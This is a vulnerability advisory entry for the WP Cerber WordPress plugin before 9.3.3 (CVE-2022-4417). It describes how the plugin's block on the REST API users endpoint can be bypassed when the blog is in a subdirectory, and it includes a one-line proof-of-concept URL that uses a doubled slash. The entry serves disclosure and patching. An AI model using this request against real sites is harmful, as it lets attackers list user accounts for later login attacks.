Lucene search
Abdul MuneebWPVDB-ID:A8C6B077-FF93-4C7B-970F-3BE4D7971AA5HistoryDec 12, 2022 - 12:00 a.m.
WP Cerber < 9.3.3 - User Enumeration Bypass via Rest API
2022-12-1200:00:00
Abdul Muneeb
wpscan.com
6
wordpress
cerber
user enumeration
rest api
subdirectory
bypass
security plugin
EPSS
0.001
Percentile
40.5%
The plugin does not properly block access to the REST API users endpoint when the blog is in a subdirectory, which could allow attackers to bypass the restriction in place and list users
PoC
When the “Block access to users’ data via REST API” settings is enabled (wp-admin/admin.php?page=cerber-security&tab;=hardening) https://example.com/subdir//wp-json/wp/v2/users
Related
cve
cve
CVE-2022-4417
2023-01-02 22:15:18
openvas
openvas
nvd
nvd
CVE-2022-4417
2023-01-02 22:15:18
wpexploit
wpexploit
WP Cerber < 9.3.3 - User Enumeration Bypass via Rest API
2022-12-12 00:00:00
cvelist
cvelist
CVE-2022-4417 WP Cerber < 9.3.3 - User Enumeration Bypass via Rest API
2023-01-02 21:49:26
prion
prion
Authentication flaw
2023-01-02 22:15:00